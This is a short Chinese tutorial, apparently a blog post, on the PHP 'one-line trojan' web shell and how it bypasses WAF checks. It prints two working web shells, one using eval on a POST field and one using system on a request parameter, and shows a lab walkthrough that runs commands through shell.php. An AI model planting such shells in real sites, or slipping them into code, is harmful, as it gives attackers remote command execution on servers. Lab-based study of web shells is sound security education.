一,什么是一句话木马?
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。
二,工作原理:
<?php @eval($_POST['shell']);?>
这是php的一句话后门中最普遍的一种。它的工作原理是:
首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。
三,实验步骤
我们使用的靶机为kali
输入ifconfig查看自己靶机的ip地址
开启apache:![]()
写一个文件内容为<?php system($_REQUEST [‘cmd’]);?> 命名为shell.php


保存路径如下:
system函数可以用来执行命令并将相应的执行结果输出
$_REQUEST [‘cmd’]获取用户提交的数据
最后访问:http://靶机IP地址/shell.php?cmd=ifconfig ![]()

4164

被折叠的 条评论
为什么被折叠?



